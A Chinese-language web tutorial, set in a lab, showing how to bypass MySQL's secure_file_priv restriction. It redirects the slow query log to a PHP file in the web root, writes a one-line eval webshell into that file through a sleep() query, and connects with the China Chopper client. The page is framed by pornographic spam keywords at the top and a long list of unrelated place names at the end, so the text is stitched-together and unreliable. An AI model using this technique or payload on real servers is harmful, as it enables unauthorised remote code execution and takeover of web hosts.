最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

MYSQL突破secure_file_priv寫shell問題

 更新時間:2024年01月18日 17:09:59   作者:W小哥1  
這篇文章主要介紹了MYSQL突破secure_file_priv寫shell問題,具有很好的參考價值,希望對大家有所幫助,如有錯誤或未考慮完全的地方,望不吝賜教

目標IP地址:192.168.106.130

本地IP地址:192.168.106.1

訪問目標網(wǎng)絡如下圖所示:

實驗場景

某些情況下,當我們進入網(wǎng)站phpmyadmin或者網(wǎng)站后臺執(zhí)行SQL命令,計劃通過select into outfile寫一句話木馬(shell),但是通常都會報錯

如下圖所示:

原因

在mysql 中 secure_file_priv的值默認為NULL。

并且無法用sql語句對其進行修改,只能夠通過以下方式修改

windows:

修改mysql.ini 文件,在[mysqld] 下添加條目: secure_file_priv =

保存,重啟mysql。

Linux:

在/etc/my.cnf的[mysqld]下面添加local-infile=0選項。

secure_file_priv作用:

  • secure_file_priv為null 表示不允許導入導出
  • secure_file_priv指定文件夾時,表示mysql的導入導出只能發(fā)生在指定的文件夾
  • secure_file_priv沒有設置時,則表示沒有任何限制

但是如果這樣的話我們就不能夠?qū)憇hell了嗎?答案是否定的。

突破限制利用方法:日志的利用

利用方法:

攻擊時進行一次附帶代碼的url請求,在日志記錄這次請求之后,通過文件包含漏洞來包含這個日志文件,從而執(zhí)行請求中的代碼。

mysql也具有日志,我們也可以通過日志來getshell。

mysql日志主要包含:錯誤日志、查詢?nèi)罩?、慢查詢?nèi)罩尽⑹聞杖罩?,日志的詳細情況參考mysql日志詳細解析

本次實驗主要利用慢查詢?nèi)罩緦憇hell

第一步:

1.設置slow_query_log=1.即啟用慢查詢?nèi)罩?默認禁用)。

分析:

slow_query_log=ON 已開啟

第二步:

修改slow_query_log_file日志文件的絕對路徑以及文件名

作為攻擊者不知道安裝路徑,可以輸入:show variables like “%char%”,執(zhí)行效果如下圖所示,得到安裝路徑

修改slow_query_log_file日志文件的絕對路徑以及文件名為C:\phpstudy\PHPTutorial\WWW\shell.php

set global slow_query_log_file=‘C:\phpstudy\PHPTutorial\WWW\shell.php’

目標靶機驗證是否成功修改:

第三步:

向日志文件寫入shell,select ‘<?php @eval($_POST[x]);?>’ or sleep(11)

因為sleep(11),SQL語句正確的話,會延遲11秒后返回執(zhí)行結(jié)果,耐心等待即可

第四步:

訪問shell.php日志文件

第五步:

中國菜刀連接

連接成功

總結(jié)

以上為個人經(jīng)驗,希望能給大家一個參考,也希望大家多多支持腳本之家。

相關(guān)文章

  • KubeSphere部署mysql的詳細步驟

    KubeSphere部署mysql的詳細步驟

    本文介紹了在KubeSphere中部署Mysql的詳細步驟,包括創(chuàng)建mysql配置、pvc掛載、工作負載、服務,并測試數(shù)據(jù)庫連接,步驟詳盡,包括yaml配置和環(huán)境變量設置,特別強調(diào)了路徑一致性和外部訪問設置,還提到了使用NodePort模式解決自定義域名連接問題
    2024-10-10
  • MySQL刪除數(shù)據(jù)庫的兩種方法

    MySQL刪除數(shù)據(jù)庫的兩種方法

    這篇文章主要為大家詳細介紹了MySQL刪除數(shù)據(jù)庫的兩種方法,感興趣的小伙伴們可以參考一下
    2016-06-06
  • 利用JuiceFS使MySQL?備份驗證性能提升?10?倍

    利用JuiceFS使MySQL?備份驗證性能提升?10?倍

    這篇文章主要介紹了如何讓?MySQL?備份驗證性能提升?10?倍,JuiceFS?非常適合用來做?MySQL?物理備份,通過不斷調(diào)整?XtraBackup?的參數(shù)和?JuiceFS?的掛載參數(shù),在一個小時內(nèi)將時間縮短到原先的?1/10,下文一起來看相關(guān)內(nèi)容的詳細介紹吧
    2022-03-03
  • linux系統(tǒng)中mysql數(shù)據(jù)庫的導入和導出

    linux系統(tǒng)中mysql數(shù)據(jù)庫的導入和導出

    本文給大家簡單記錄了一下在linux系統(tǒng)中mysql數(shù)據(jù)庫的導入和導出的方法,有相同需求的小伙伴可以參考下
    2016-02-02
  • C++連接使用MySQL的方法

    C++連接使用MySQL的方法

    這篇文章主要為大家詳細介紹了C++連接使用MySQL的方法,文中示例代碼介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2020-07-07
  • 淺談mysql哪些情況會導致索引失效

    淺談mysql哪些情況會導致索引失效

    索引在我們使用MySQL數(shù)據(jù)庫時可以極大的提高查詢效率,然而,有時候因為使用上的一些瑕疵就會導致索引的失效,無法達到我們使用索引的預期效果,本文就介紹一下幾種索引失效的方法
    2021-11-11
  • 關(guān)于mysql中的json解析函數(shù)JSON_EXTRACT

    關(guān)于mysql中的json解析函數(shù)JSON_EXTRACT

    這篇文章主要介紹了關(guān)于mysql中的json解析函數(shù)JSON_EXTRACT講解,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2022-07-07
  • MySQL無法輸入中文字符問題的解決辦法

    MySQL無法輸入中文字符問題的解決辦法

    MySQL無法輸入中文的問題大多是由于字符集不匹配所導致的,下面這篇文章主要給大家介紹了關(guān)于MySQL無法輸入中文字符問題的解決辦法,文中通過實例代碼介紹的非常詳細,需要的朋友可以參考下
    2023-05-05
  • Mysql系列SQL查詢語句書寫順序及執(zhí)行順序詳解

    Mysql系列SQL查詢語句書寫順序及執(zhí)行順序詳解

    這篇文章主要為大家介紹了Mysql系列SQL查詢語句的書寫順序及執(zhí)行順序示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步
    2021-10-10
  • MySQL實現(xiàn)MYISAM表批量壓縮的方法

    MySQL實現(xiàn)MYISAM表批量壓縮的方法

    這篇文章主要介紹了MySQL實現(xiàn)MYISAM表批量壓縮的方法,實例分析了MySQL使用shell命令批量壓縮MYISAM表的相關(guān)技巧,需要的朋友可以參考下
    2016-04-04

最新評論

来凤县| 四平市| 乐昌市| 金门县| 新邵县| 嘉义县| 高雄县| 积石山| 沅陵县| 陇西县| 武乡县| 图片| 新晃| 新丰县| 休宁县| 金堂县| 河池市| 镇江市| 南木林县| 马公市| 昭平县| 仙桃市| 香港| 冷水江市| 忻州市| 昌邑市| 兰溪市| 神木县| 新昌县| 泰兴市| 固始县| 陕西省| 凌源市| 福建省| 金寨县| 巴林左旗| 磐石市| 济源市| 河东区| 渑池县| 宿松县|